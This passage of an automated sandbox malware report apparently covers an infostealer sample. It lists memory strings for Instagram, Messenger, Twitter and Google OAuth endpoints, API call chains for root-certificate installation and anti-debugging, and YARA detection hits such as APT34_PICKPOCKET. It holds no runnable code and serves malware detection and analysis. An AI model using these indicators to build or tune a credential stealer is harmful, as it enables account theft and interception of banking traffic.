Source: 63C4F3D9EA0CC861.exe, 00000003.00000002.368837459.000000000354C000.00000004.00000001.sdmp, 63C4F3D9EA0CC861.exe, 00000004.00000002.275225860.000000000344C000.00000004.00000001.sdmpString found in binary or memory: https://upload.twitter.com/i/media/upload.json?command=APPEND&media_id=%s&segment_index=0accept:
Source: 63C4F3D9EA0CC861.exe, 00000003.00000002.368837459.000000000354C000.00000004.00000001.sdmp, 63C4F3D9EA0CC861.exe, 00000004.00000002.275225860.000000000344C000.00000004.00000001.sdmpString found in binary or memory: https://upload.twitter.com/i/media/upload.jsoncommand=FINALIZE&media_id=
Source: 63C4F3D9EA0CC861.exe, 00000003.00000002.368837459.000000000354C000.00000004.00000001.sdmp, 63C4F3D9EA0CC861.exe, 00000004.00000002.275225860.000000000344C000.00000004.00000001.sdmp, ecvB803.tmp.11.drString found in binary or memory: https://www.digicert.com/CPS0
Source: ecvB803.tmp.11.drString found in binary or memory: https://www.google-analytics.com/analytics.js
Source: ecvB803.tmp.11.drString found in binary or memory: https://www.google-analytics.com/gtm/js?id=GTM-N7S69J3&cid=485847574.1601477586
Source: 63C4F3D9EA0CC861.exe, 63C4F3D9EA0CC861.exe, 00000004.00000003.262093125.0000000003F27000.00000004.00000001.sdmpString found in binary or memory: https://www.google.com
Source: 63C4F3D9EA0CC861.exe, 00000004.00000003.262299790.0000000003F62000.00000004.00000001.sdmp, ecvB803.tmp.11.drString found in binary or memory: https://www.google.com/
Source: 63C4F3D9EA0CC861.exe, 00000004.00000003.262093125.0000000003F27000.00000004.00000001.sdmpString found in binary or memory: https://www.google.com/7
Source: ecvB803.tmp.11.drString found in binary or memory: https://www.google.com/chrome/
Source: ecvB803.tmp.11.drString found in binary or memory: https://www.google.com/chrome/application/x-msdownloadC:
Source: ecvB803.tmp.11.drString found in binary or memory: https://www.google.com/chrome/static/css/main.v2.min.css
Source: ecvB803.tmp.11.drString found in binary or memory: https://www.google.com/chrome/static/css/main.v3.min.css
Source: ecvB803.tmp.11.drString found in binary or memory: https://www.google.com/chrome/static/images/app-store-download.png
Source: ecvB803.tmp.11.drString found in binary or memory: https://www.google.com/chrome/static/images/chrome-logo.svg
Source: ecvB803.tmp.11.drString found in binary or memory: https://www.google.com/chrome/static/images/chrome_safari-behavior.jpg
Source: ecvB803.tmp.11.drString found in binary or memory: https://www.google.com/chrome/static/images/chrome_throbber_fast.gif
Source: ecvB803.tmp.11.drString found in binary or memory: https://www.google.com/chrome/static/images/cursor-replay.cur
Source: ecvB803.tmp.11.drString found in binary or memory: https://www.google.com/chrome/static/images/download-browser/big_pixel_phone.png
Source: ecvB803.tmp.11.drString found in binary or memory: https://www.google.com/chrome/static/images/download-browser/pixel_phone.png
Source: ecvB803.tmp.11.drString found in binary or memory: https://www.google.com/chrome/static/images/download-browser/pixel_tablet.png
Source: ecvB803.tmp.11.drString found in binary or memory: https://www.google.com/chrome/static/images/fallback/google-chrome-logo.jpg
Source: ecvB803.tmp.11.drString found in binary or memory: https://www.google.com/chrome/static/images/fallback/google-logo-one-color.jpg
Source: ecvB803.tmp.11.drString found in binary or memory: https://www.google.com/chrome/static/images/fallback/icon-description-white-blue-bg.jpg
Source: ecvB803.tmp.11.drString found in binary or memory: https://www.google.com/chrome/static/images/fallback/icon-fb.jpg
Source: ecvB803.tmp.11.drString found in binary or memory: https://www.google.com/chrome/static/images/fallback/icon-file-download.jpg
Source: ecvB803.tmp.11.drString found in binary or memory: https://www.google.com/chrome/static/images/fallback/icon-help.jpg
Source: ecvB803.tmp.11.drString found in binary or memory: https://www.google.com/chrome/static/images/fallback/icon-twitter.jpg
Source: ecvB803.tmp.11.drString found in binary or memory: https://www.google.com/chrome/static/images/fallback/icon-youtube.jpg
Source: ecvB803.tmp.11.drString found in binary or memory: https://www.google.com/chrome/static/images/favicons/favicon-16x16.png
Source: ecvB803.tmp.11.drString found in binary or memory: https://www.google.com/chrome/static/images/folder-applications.svg
Source: ecvB803.tmp.11.drString found in binary or memory: https://www.google.com/chrome/static/images/google-play-download.png
Source: ecvB803.tmp.11.drString found in binary or memory: https://www.google.com/chrome/static/images/homepage/google-beta.png
Source: ecvB803.tmp.11.drString found in binary or memory: https://www.google.com/chrome/static/images/homepage/google-canary.png
Source: ecvB803.tmp.11.drString found in binary or memory: https://www.google.com/chrome/static/images/homepage/google-dev.png
Source: ecvB803.tmp.11.drString found in binary or memory: https://www.google.com/chrome/static/images/homepage/google-enterprise.png
Source: ecvB803.tmp.11.drString found in binary or memory: https://www.google.com/chrome/static/images/homepage/hero-anim-bottom-left.png
Source: ecvB803.tmp.11.drString found in binary or memory: https://www.google.com/chrome/static/images/homepage/hero-anim-middle.png
Source: ecvB803.tmp.11.drString found in binary or memory: https://www.google.com/chrome/static/images/homepage/hero-anim-top-right.png
Source: ecvB803.tmp.11.drString found in binary or memory: https://www.google.com/chrome/static/images/homepage/homepage_features.png
Source: ecvB803.tmp.11.drString found in binary or memory: https://www.google.com/chrome/static/images/homepage/homepage_privacy.png
Source: ecvB803.tmp.11.drString found in binary or memory: https://www.google.com/chrome/static/images/homepage/homepage_tools.png
Source: ecvB803.tmp.11.drString found in binary or memory: https://www.google.com/chrome/static/images/homepage/laptop_desktop.png
Source: ecvB803.tmp.11.drString found in binary or memory: https://www.google.com/chrome/static/images/icon-announcement.svg
Source: ecvB803.tmp.11.drString found in binary or memory: https://www.google.com/chrome/static/images/icon-file-download.svg
Source: ecvB803.tmp.11.drString found in binary or memory: https://www.google.com/chrome/static/images/mac-ico.png
Source: ecvB803.tmp.11.drString found in binary or memory: https://www.google.com/chrome/static/images/thank-you/thankyou-animation.json
Source: ecvB803.tmp.11.drString found in binary or memory: https://www.google.com/chrome/static/js/installer.min.js
Source: ecvB803.tmp.11.drString found in binary or memory: https://www.google.com/chrome/static/js/main.v2.min.js
Source: ecvB803.tmp.11.drString found in binary or memory: https://www.google.com/chrome/thank-you.html?statcb=0&installdataindex=empty&defaultbrowser=0
Source: 63C4F3D9EA0CC861.exe, 63C4F3D9EA0CC861.exe, 00000004.00000003.262093125.0000000003F27000.00000004.00000001.sdmp, 63C4F3D9EA0CC861.exe, 00000004.00000003.262688251.0000000003F57000.00000004.00000001.sdmpString found in binary or memory: https://www.google.com/cloudprint
Source: 63C4F3D9EA0CC861.exeString found in binary or memory: https://www.google.com/cloudprint/enab
Source: 63C4F3D9EA0CC861.exe, 63C4F3D9EA0CC861.exe, 00000004.00000003.262688251.0000000003F57000.00000004.00000001.sdmpString found in binary or memory: https://www.google.com/cloudprint/enable_chrome_connector
Source: 63C4F3D9EA0CC861.exe, 00000004.00000003.262093125.0000000003F27000.00000004.00000001.sdmpString found in binary or memory: https://www.google.com/cloudprint/enable_chrome_connectorHN
Source: 63C4F3D9EA0CC861.exe, 00000003.00000003.284978493.000000000072F000.00000004.00000001.sdmp, Web Data1612045902911.3.drString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: 63C4F3D9EA0CC861.exe, 63C4F3D9EA0CC861.exe, 00000004.00000003.262093125.0000000003F27000.00000004.00000001.sdmpString found in binary or memory: https://www.google.com;
Source: ecvB803.tmp.11.drString found in binary or memory: https://www.googleadservices.com/pagead/conversion.js
Source: ecvB803.tmp.11.drString found in binary or memory: https://www.googleadservices.com/pagead/conversion_async.js
Source: ecvB803.tmp.11.drString found in binary or memory: https://www.googleadservices.com/pagead/p3p.xml
Source: 63C4F3D9EA0CC861.exeString found in binary or memory: https://www.googleapis.com/
Source: 63C4F3D9EA0CC861.exeString found in binary or memory: https://www.googleapis.com/auth/calend
Source: 63C4F3D9EA0CC861.exe, 63C4F3D9EA0CC861.exe, 00000004.00000003.262093125.0000000003F27000.00000004.00000001.sdmpString found in binary or memory: https://www.googleapis.com/auth/calendar.readonly
Source: 63C4F3D9EA0CC861.exe, 63C4F3D9EA0CC861.exe, 00000004.00000003.262093125.0000000003F27000.00000004.00000001.sdmpString found in binary or memory: https://www.googleapis.com/auth/cast-edu-messaging
Source: 63C4F3D9EA0CC861.exe, 63C4F3D9EA0CC861.exe, 00000004.00000003.262789067.0000000003F2E000.00000004.00000001.sdmpString found in binary or memory: https://www.googleapis.com/auth/chromewebstore
Source: 63C4F3D9EA0CC861.exeString found in binary or memory: https://www.googleapis.com/auth/chromewebstore.readonly
Source: 63C4F3D9EA0CC861.exe, 00000004.00000003.262093125.0000000003F27000.00000004.00000001.sdmpString found in binary or memory: https://www.googleapis.com/auth/chromewebstore.readonlyourc
Source: 63C4F3D9EA0CC861.exe, 00000004.00000003.262093125.0000000003F27000.00000004.00000001.sdmpString found in binary or memory: https://www.googleapis.com/auth/chromewebstoreU
Source: 63C4F3D9EA0CC861.exe, 00000004.00000003.262093125.0000000003F27000.00000004.00000001.sdmpString found in binary or memory: https://www.googleapis.com/auth/chromewebstoreh
Source: 63C4F3D9EA0CC861.exe, 63C4F3D9EA0CC861.exe, 00000004.00000003.262093125.0000000003F27000.00000004.00000001.sdmpString found in binary or memory: https://www.googleapis.com/auth/clouddevices
Source: 63C4F3D9EA0CC861.exeString found in binary or memory: https://www.googleapis.com/auth/h
Source: 63C4F3D9EA0CC861.exeString found in binary or memory: https://www.googleapis.com/auth/hangouts
Source: 63C4F3D9EA0CC861.exe, 63C4F3D9EA0CC861.exe, 00000004.00000003.262093125.0000000003F27000.00000004.00000001.sdmpString found in binary or memory: https://www.googleapis.com/auth/hangouts.readonly
Source: 63C4F3D9EA0CC861.exe, 00000004.00000003.262093125.0000000003F27000.00000004.00000001.sdmpString found in binary or memory: https://www.googleapis.com/auth/hangoutsrx
Source: 63C4F3D9EA0CC861.exeString found in binary or memory: https://www.googleapis.com/auth/meetings
Source: 63C4F3D9EA0CC861.exe, 00000004.00000003.262093125.0000000003F27000.00000004.00000001.sdmpString found in binary or memory: https://www.googleapis.com/auth/meetingsrx
Source: 63C4F3D9EA0CC861.exeString found in binary or memory: https://www.googleapis.com/auth/plus.peopleapi.readwri
Source: 63C4F3D9EA0CC861.exeString found in binary or memory: https://www.googleapis.com/auth/plus.peopleapi.readwrite
Source: 63C4F3D9EA0CC861.exe, 00000004.00000003.262093125.0000000003F27000.00000004.00000001.sdmpString found in binary or memory: https://www.googleapis.com/auth/plus.peopleapi.readwriteu
Source: 63C4F3D9EA0CC861.exeString found in binary or memory: https://www.googleapis.com/auth/sierra
Source: 63C4F3D9EA0CC861.exe, 00000004.00000003.262093125.0000000003F27000.00000004.00000001.sdmpString found in binary or memory: https://www.googleapis.com/auth/sierraM
Source: 63C4F3D9EA0CC861.exe, 63C4F3D9EA0CC861.exe, 00000004.00000003.262093125.0000000003F27000.00000004.00000001.sdmpString found in binary or memory: https://www.googleapis.com/auth/sierrasandbox
Source: 63C4F3D9EA0CC861.exe, 63C4F3D9EA0CC861.exe, 00000004.00000003.262093125.0000000003F27000.00000004.00000001.sdmp, 63C4F3D9EA0CC861.exe, 00000004.00000003.262789067.0000000003F2E000.00000004.00000001.sdmpString found in binary or memory: https://www.googleapis.com/auth/userinfo.email
Source: ecvB803.tmp.11.drString found in binary or memory: https://www.googletagmanager.com/gtag/js?id=UA-26908291-4
Source: ecvB803.tmp.11.drString found in binary or memory: https://www.googletagmanager.com/gtm.js?id=GTM-PZ6TRJB
Source: ecvB803.tmp.11.drString found in binary or memory: https://www.gstatic.com/external_hosted/autotrack/autotrack.js
Source: ecvB803.tmp.11.drString found in binary or memory: https://www.gstatic.com/external_hosted/lottie/lottie.js
Source: ecvB803.tmp.11.drString found in binary or memory: https://www.gstatic.com/external_hosted/modernizr/modernizr.js
Source: ecvB803.tmp.11.drString found in binary or memory: https://www.gstatic.com/external_hosted/scrollmagic/ScrollMagic.min.js
Source: ecvB803.tmp.11.drString found in binary or memory: https://www.gstatic.com/external_hosted/scrollmagic/animation.gsap.min.js
Source: 63C4F3D9EA0CC861.exe, 63C4F3D9EA0CC861.exe, 00000004.00000003.262093125.0000000003F27000.00000004.00000001.sdmpString found in binary or memory: https://www.gstatic.com;
Source: 63C4F3D9EA0CC861.exe, 00000004.00000002.275225860.000000000344C000.00000004.00000001.sdmpString found in binary or memory: https://www.instagram.com/
Source: 63C4F3D9EA0CC861.exe, 00000003.00000002.368837459.000000000354C000.00000004.00000001.sdmp, 63C4F3D9EA0CC861.exe, 00000004.00000002.275225860.000000000344C000.00000004.00000001.sdmpString found in binary or memory: https://www.instagram.com/accept:
Source: 63C4F3D9EA0CC861.exe, 00000004.00000002.275225860.000000000344C000.00000004.00000001.sdmpString found in binary or memory: https://www.instagram.com/accounts/login/ajax/facebook/
Source: 63C4F3D9EA0CC861.exe, 00000004.00000002.275225860.000000000344C000.00000004.00000001.sdmpString found in binary or memory: https://www.instagram.com/graphql/query/?query_hash=149bef52a3b2af88c0fec37913fe1cbc&variables=%7B%2
Source: 63C4F3D9EA0CC861.exe, 00000003.00000002.368837459.000000000354C000.00000004.00000001.sdmp, 63C4F3D9EA0CC861.exe, 00000004.00000002.275225860.000000000344C000.00000004.00000001.sdmpString found in binary or memory: https://www.instagram.com/sec-fetch-site:
Source: 63C4F3D9EA0CC861.exe, 00000003.00000002.368837459.000000000354C000.00000004.00000001.sdmp, 63C4F3D9EA0CC861.exe, 00000004.00000002.275225860.000000000344C000.00000004.00000001.sdmpString found in binary or memory: https://www.instagram.comsec-fetch-mode:
Source: 63C4F3D9EA0CC861.exe, 00000003.00000002.368837459.000000000354C000.00000004.00000001.sdmp, 63C4F3D9EA0CC861.exe, 00000004.00000002.275225860.000000000344C000.00000004.00000001.sdmpString found in binary or memory: https://www.messenger.com
Source: 63C4F3D9EA0CC861.exe, 00000003.00000002.368837459.000000000354C000.00000004.00000001.sdmp, 63C4F3D9EA0CC861.exe, 00000004.00000002.275225860.000000000344C000.00000004.00000001.sdmpString found in binary or memory: https://www.messenger.com/
Source: 63C4F3D9EA0CC861.exe, 00000003.00000002.368837459.000000000354C000.00000004.00000001.sdmp, 63C4F3D9EA0CC861.exe, 00000004.00000002.275225860.000000000344C000.00000004.00000001.sdmpString found in binary or memory: https://www.messenger.com/accept:
Source: 63C4F3D9EA0CC861.exe, 00000003.00000002.368837459.000000000354C000.00000004.00000001.sdmp, 63C4F3D9EA0CC861.exe, 00000004.00000002.275225860.000000000344C000.00000004.00000001.sdmpString found in binary or memory: https://www.messenger.com/login/nonce/
Source: 63C4F3D9EA0CC861.exe, 00000004.00000002.275225860.000000000344C000.00000004.00000001.sdmpString found in binary or memory: https://www.messenger.com/origin:
Source: 63C4F3D9EA0CC861.exe, 00000003.00000002.368837459.000000000354C000.00000004.00000001.sdmp, 63C4F3D9EA0CC861.exe, 00000004.00000002.275225860.000000000344C000.00000004.00000001.sdmpString found in binary or memory: https://www.messenger.comhttps://www.messenger.com/login/nonce/ookie:
Source: C:\Users\user\AppData\Roaming\1612045890161.exeCode function: 11_2_0040AE4D OpenClipboard,

E-Banking Fraud:

barindex
Registers a new ROOT certificateShow sources
Source: C:\Users\user\Desktop\fnhcdXEfus.exeCode function: 0_2_1001F720 CryptStringToBinaryA,CryptStringToBinaryA,CertCreateCertificateContext,CertOpenStore,CertAddCertificateContextToStore,GetLastError,CertGetCertificateContextProperty,_memset,CertGetCertificateContextProperty,_memset,_memset,_sprintf,_sprintf,CertCloseStore,CertFreeCertificateContext,

System Summary:

barindex
Malicious sample detected (through community Yara rule)Show sources
Source: 4.2.63C4F3D9EA0CC861.exe.3280000.6.unpack, type: UNPACKEDPEMatched rule: APT34_PICKPOCKET Author: unknown
Source: 3.2.63C4F3D9EA0CC861.exe.3380000.5.unpack, type: UNPACKEDPEMatched rule: APT34_PICKPOCKET Author: unknown
PE file has a writeable .text sectionShow sources
Source: fnhcdXEfus.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: 63C4F3D9EA0CC861.exe.0.drStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\fnhcdXEfus.exeCode function: 0_2_10019D40 LoadLibraryA,GetProcAddress,GetCurrentThread,NtSetInformationThread,
Source: C:\Users\user\Desktop\fnhcdXEfus.exeCode function: 0_2_10019F00 LoadLibraryA,GetProcAddress,GetCurrentProcess,NtQueryInformationProcess,
Source: C:\Users\user\Desktop\fnhcdXEfus.exeCode function: 0_2_10019F50 LoadLibraryA,GetProcAddress,GetCurrentProcess,NtQueryInformationProcess,
Source: C:\Users\user\Desktop\fnhcdXEfus.exeCode function: 0_2_10019FA0 LoadLibraryA,GetProcAddress,GetCurrentProcess,NtQueryInformationProcess,
Source: C:\Users\user\AppData\Roaming\1612045890161.exeCode function: 11_2_0040C516 NtQuerySystemInformation,
Source: C:\Users\user\AppData\Roaming\1612045890161.exeCode function: 11_2_0040C6FB memset,CreateFileW,FindCloseChangeNotification,GetCurrentProcessId,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,NtQueryObject,CloseHandle,_wcsicmp,CloseHandle,FreeLibrary,
Source: C:\Users\user\Desktop\fnhcdXEfus.exeCode function: 0_2_1001D560: wsprintfW,CreateFileW,_memset,DeviceIoControl,FindCloseChangeNotification,
Source: C:\Users\user\Desktop\fnhcdXEfus.exeCode function: 0_2_0045895B GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,
Source: C:\Users\user\Desktop\fnhcdXEfus.exeCode function: 0_2_00445630
Source: C:\Users\user\Desktop\fnhcdXEfus.exeCode function: 0_2_0045015C
Source: C:\Users\user\Desktop\fnhcdXEfus.exeCode function: 0_2_004506CC
Source: C:\Users\user\Desktop\fnhcdXEfus.exeCode function: 0_2_00450C3C
Source: C:\Users\user\Desktop\fnhcdXEfus.exeCode function: 0_2_00409140
Source: C:\Users\user\Desktop\fnhcdXEfus.exeCode function: 0_2_00409580
Source: C:\Users\user\Desktop\fnhcdXEfus.exeCode function: 0_2_00445612
Source: C:\Users\user\Desktop\fnhcdXEfus.exeCode function: 0_2_00445620
Source: C:\Users\user\Desktop\fnhcdXEfus.exeCode function: 0_2_004456C3
Source: C:\Users\user\Desktop\fnhcdXEfus.exeCode function: 0_2_00409870
Source: C:\Users\user\Desktop\fnhcdXEfus.exeCode function: 0_2_00461A30
Source: C:\Users\user\Desktop\fnhcdXEfus.exeCode function: 0_2_00451A3C
Source: C:\Users\user\Desktop\fnhcdXEfus.exeCode function: 0_2_00445BD3
Source: C:\Users\user\Desktop\fnhcdXEfus.exeCode function: 0_2_0044E1E6
Source: C:\Users\user\Desktop\fnhcdXEfus.exeCode function: 0_2_004521B8
Source: C:\Users\user\Desktop\fnhcdXEfus.exeCode function: 0_2_00422751
Source: C:\Users\user\Desktop\fnhcdXEfus.exeCode function: 0_2_00406A40
Source: C:\Users\user\Desktop\fnhcdXEfus.exeCode function: 0_2_0043ACD1
Source: C:\Users\user\Desktop\fnhcdXEfus.exeCode function: 0_2_0044AD9A
Source: C:\Users\user\Desktop\fnhcdXEfus.exeCode function: 0_2_00407162
Source: C:\Users\user\Desktop\fnhcdXEfus.exeCode function: 0_2_004073B5
Source: C:\Users\user\Desktop\fnhcdXEfus.exeCode function: 0_2_0044B6B4
Source: C:\Users\user\Desktop\fnhcdXEfus.exeCode function: 0_2_100071F0
Source: C:\Users\user\Desktop\fnhcdXEfus.exeCode function: 0_2_10009257
Source: C:\Users\user\Desktop\fnhcdXEfus.exeCode function: 0_2_1000B3B0
Source: C:\Users\user\Desktop\fnhcdXEfus.exeCode function: 0_2_1000B883
Source: C:\Users\user\Desktop\fnhcdXEfus.exeCode function: 0_2_100099E0
Source: C:\Users\user\Desktop\fnhcdXEfus.exeCode function: 0_2_1000BC57
Source: C:\Users\user\Desktop\fnhcdXEfus.exeCode function: 0_2_1000FF71
Source: C:\Users\user\Desktop\fnhcdXEfus.exeCode function: 0_2_1000C063
Source: C:\Users\user\Desktop\fnhcdXEfus.exeCode function: 0_2_100060F0
Source: C:\Users\user\Desktop\fnhcdXEfus.exeCode function: 0_2_10008340
Source: C:\Users\user\Desktop\fnhcdXEfus.exeCode function: 0_2_1000E380
Source: C:\Users\user\Desktop\fnhcdXEfus.exeCode function: 0_2_100083F0
Source: C:\Users\user\Desktop\fnhcdXEfus.exeCode function: 0_2_1000C483
Source: C:\Users\user\Desktop\fnhcdXEfus.exeCode function: 0_2_10010590
Source: C:\Users\user\Desktop\fnhcdXEfus.exeCode function: 0_2_100169BD
Source: C:\Users\user\Desktop\fnhcdXEfus.exeCode function: 0_2_10010AED
Source: C:\Users\user\Desktop\fnhcdXEfus.exeCode function: 0_2_1000ABA0
Source: C:\Users\user\Desktop\fnhcdXEfus.exeCode function: 0_2_1001EBD0
Source: C:\Users\user\Desktop\fnhcdXEfus.exeCode function: 0_2_1001EDDB
Source: C:\Users\user\AppData\Local\Temp\63C4F3D9EA0CC861.exeCode function: 3_2_1000C063
Source: C:\Users\user\AppData\Local\Temp\63C4F3D9EA0CC861.exeCode function: 3_2_1000B883
Source: C:\Users\user\AppData\Local\Temp\63C4F3D9EA0CC861.exeCode function: 3_2_100060F0
Source: C:\Users\user\AppData\Local\Temp\63C4F3D9EA0CC861.exeCode function: 3_2_100169BD
Source: C:\Users\user\AppData\Local\Temp\63C4F3D9EA0CC861.exeCode function: 3_2_100099E0
Source: C:\Users\user\AppData\Local\Temp\63C4F3D9EA0CC861.exeCode function: 3_2_100071F0
Source: C:\Users\user\AppData\Local\Temp\63C4F3D9EA0CC861.exeCode function: 3_2_10009257
Source: C:\Users\user\AppData\Local\Temp\63C4F3D9EA0CC861.exeCode function: 3_2_10010AED
Source: C:\Users\user\AppData\Local\Temp\63C4F3D9EA0CC861.exeCode function: 3_2_10008340
Source: C:\Users\user\AppData\Local\Temp\63C4F3D9EA0CC861.exeCode function: 3_2_1000E380
Source: C:\Users\user\AppData\Local\Temp\63C4F3D9EA0CC861.exeCode function: 3_2_1000ABA0
Source: C:\Users\user\AppData\Local\Temp\63C4F3D9EA0CC861.exeCode function: 3_2_1000B3B0
Source: C:\Users\user\AppData\Local\Temp\63C4F3D9EA0CC861.exeCode function: 3_2_1001EBD0
Source: C:\Users\user\AppData\Local\Temp\63C4F3D9EA0CC861.exeCode function: 3_2_100083F0
Source: C:\Users\user\AppData\Local\Temp\63C4F3D9EA0CC861.exeCode function: 3_2_1000BC57
Source: C:\Users\user\AppData\Local\Temp\63C4F3D9EA0CC861.exeCode function: 3_2_1000C483
Source: C:\Users\user\AppData\Local\Temp\63C4F3D9EA0CC861.exeCode function: 3_2_10010590
Source: C:\Users\user\AppData\Local\Temp\63C4F3D9EA0CC861.exeCode function: 3_2_1001EDDB
Source: C:\Users\user\AppData\Local\Temp\63C4F3D9EA0CC861.exeCode function: 3_2_1000FF71
Source: C:\Users\user\AppData\Roaming\1612045890161.exeCode function: 11_2_00404BE4
Source: C:\Users\user\AppData\Local\Temp\download\ThunderFW.exeCode function: 30_2_002B963B
Source: C:\Users\user\AppData\Local\Temp\download\ThunderFW.exeCode function: 30_2_002B6A1E
Source: C:\Users\user\AppData\Local\Temp\download\ThunderFW.exeCode function: 30_2_002BA0C3
Source: C:\Users\user\AppData\Local\Temp\download\ThunderFW.exeCode function: 30_2_002BB51C
Source: C:\Users\user\AppData\Local\Temp\download\ThunderFW.exeCode function: 30_2_002B9B7F
Source: C:\Users\user\AppData\Local\Temp\download\ThunderFW.exeCode function: 30_2_002BA7BB
Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Temp\63C4F3D9EA0CC861.exe 344B323928698D9982C7577E5405A1CB587C45F94A0F6745827648381397F255
Source: C:\Users\user\AppData\Local\Temp\63C4F3D9EA0CC861.exeCode function: String function: 10010534 appears 35 times
Source: C:\Users\user\Desktop\fnhcdXEfus.exeCode function: String function: 0044280F appears 302 times
Source: C:\Users\user\Desktop\fnhcdXEfus.exeCode function: String function: 004025E0 appears 342 times
Source: C:\Users\user\Desktop\fnhcdXEfus.exeCode function: String function: 10010534 appears 35 times
Source: C:\Users\user\Desktop\fnhcdXEfus.exeCode function: String function: 0040C6E1 appears 99 times
Source: C:\Users\user\Desktop\fnhcdXEfus.exeCode function: String function: 00411D8B appears 39 times
Source: C:\Users\user\Desktop\fnhcdXEfus.exeCode function: String function: 00442842 appears 295 times
Source: C:\Users\user\Desktop\fnhcdXEfus.exeCode function: String function: 00442878 appears 83 times
Source: C:\Users\user\Desktop\fnhcdXEfus.exeCode function: String function: 00441423 appears 42 times
Source: C:\Users\user\Desktop\fnhcdXEfus.exeCode function: String function: 004115CB appears 41 times
Source: C:\Users\user\Desktop\fnhcdXEfus.exeCode function: String function: 00401070 appears 36 times
Source: C:\Users\user\Desktop\fnhcdXEfus.exeCode function: String function: 00441570 appears 54 times
Source: fnhcdXEfus.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: 63C4F3D9EA0CC861.exe.0.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: 1612045890161.exe.3.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: 1612045890161.exe.3.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: fnhcdXEfus.exe, 00000000.00000002.246163908.00000000024AA000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameInstallShield Setup.exe^ vs fnhcdXEfus.exe
Source: fnhcdXEfus.exe, 00000000.00000002.246034972.0000000000BA0000.00000002.00000001.sdmpBinary or memory string: OriginalFilenamemswsock.dll.muij% vs fnhcdXEfus.exe
Source: fnhcdXEfus.exe, 00000000.00000002.246020495.0000000000B80000.00000002.00000001.sdmpBinary or memory string: OriginalFilenamenlsbres.dllj% vs fnhcdXEfus.exe
Source: fnhcdXEfus.exe, 00000000.00000002.246024794.0000000000B90000.00000002.00000001.sdmpBinary or memory string: OriginalFilenamenlsbres.dll.muij% vs fnhcdXEfus.exe
Source: fnhcdXEfus.exeBinary or memory string: OriginalFilenameInstallShield Setup.exe^ vs fnhcdXEfus.exe
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc.dll
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: tsappcmp.dll
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc.dll
Source: fnhcdXEfus.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
Source: 00000004.00000002.274583056.00000000026D0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Ping_Command_in_EXE date = 2016-11-03, author = Florian Roth, description = Detects an suspicious ping command execution in an executable, reference = Internal Research, license = https://creativecommons.org/licenses/by-nc/4.0/, score =
Source: 00000003.00000002.365832214.00000000026F0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Ping_Command_in_EXE date = 2016-11-03, author = Florian Roth, description = Detects an suspicious ping command execution in an executable, reference = Internal Research, license = https://creativecommons.org/licenses/by-nc/4.0/, score =
Source: 00000000.00000002.246525217.0000000002810000.00000040.00000001.sdmp, type: MEMORYMatched rule: Ping_Command_in_EXE date = 2016-11-03, author = Florian Roth, description = Detects an suspicious ping command execution in an executable, reference = Internal Research, license = https://creativecommons.org/licenses/by-nc/4.0/, score =
Source: 0.2.fnhcdXEfus.exe.2810000.5.unpack, type: UNPACKEDPEMatched rule: Ping_Command_in_EXE date = 2016-11-03, author = Florian Roth, description = Detects an suspicious ping command execution in an executable, reference = Internal Research, license = https://creativecommons.org/licenses/by-nc/4.0/, score =
Source: 3.2.63C4F3D9EA0CC861.exe.26f0000.2.raw.unpack, type: UNPACKEDPEMatched rule: Ping_Command_in_EXE date = 2016-11-03, author = Florian Roth, description = Detects an suspicious ping command execution in an executable, reference = Internal Research, license = https://creativecommons.org/licenses/by-nc/4.0/, score =
Source: 4.2.63C4F3D9EA0CC861.exe.26d0000.5.unpack, type: UNPACKEDPEMatched rule: Ping_Command_in_EXE date = 2016-11-03, author = Florian Roth, description = Detects an suspicious ping command execution in an executable, reference = Internal Research, license = https://creativecommons.org/licenses/by-nc/4.0/, score =
Source: 4.2.63C4F3D9EA0CC861.exe.10000000.7.unpack, type: UNPACKEDPEMatched rule: Ping_Command_in_EXE date = 2016-11-03, author = Florian Roth, description = Detects an suspicious ping command execution in an executable, reference = Internal Research, license = https://creativecommons.org/licenses/by-nc/4.0/, score =
Source: 3.2.63C4F3D9EA0CC861.exe.10000000.7.unpack, type: UNPACKEDPEMatched rule: Ping_Command_in_EXE date = 2016-11-03, author = Florian Roth, description = Detects an suspicious ping command execution in an executable, reference = Internal Research, license = https://creativecommons.org/licenses/by-nc/4.0/, score =
Source: 4.2.63C4F3D9EA0CC861.exe.26d0000.5.raw.unpack, type: UNPACKEDPEMatched rule: Ping_Command_in_EXE date = 2016-11-03, author = Florian Roth, description = Detects an suspicious ping command execution in an executable, reference = Internal Research, license = https://creativecommons.org/licenses/by-nc/4.0/, score =
Source: 3.2.63C4F3D9EA0CC861.exe.26f0000.2.unpack, type: UNPACKEDPEMatched rule: Ping_Command_in_EXE date = 2016-11-03, author = Florian Roth, description = Detects an suspicious ping command execution in an executable, reference = Internal Research, license = https://creativecommons.org/licenses/by-nc/4.0/, score =
Source: 0.2.fnhcdXEfus.exe.10000000.6.unpack, type: UNPACKEDPEMatched rule: Ping_Command_in_EXE date = 2016-11-03, author = Florian Roth, description = Detects an suspicious ping command execution in an executable, reference = Internal Research, license = https://creativecommons.org/licenses/by-nc/4.0/, score =
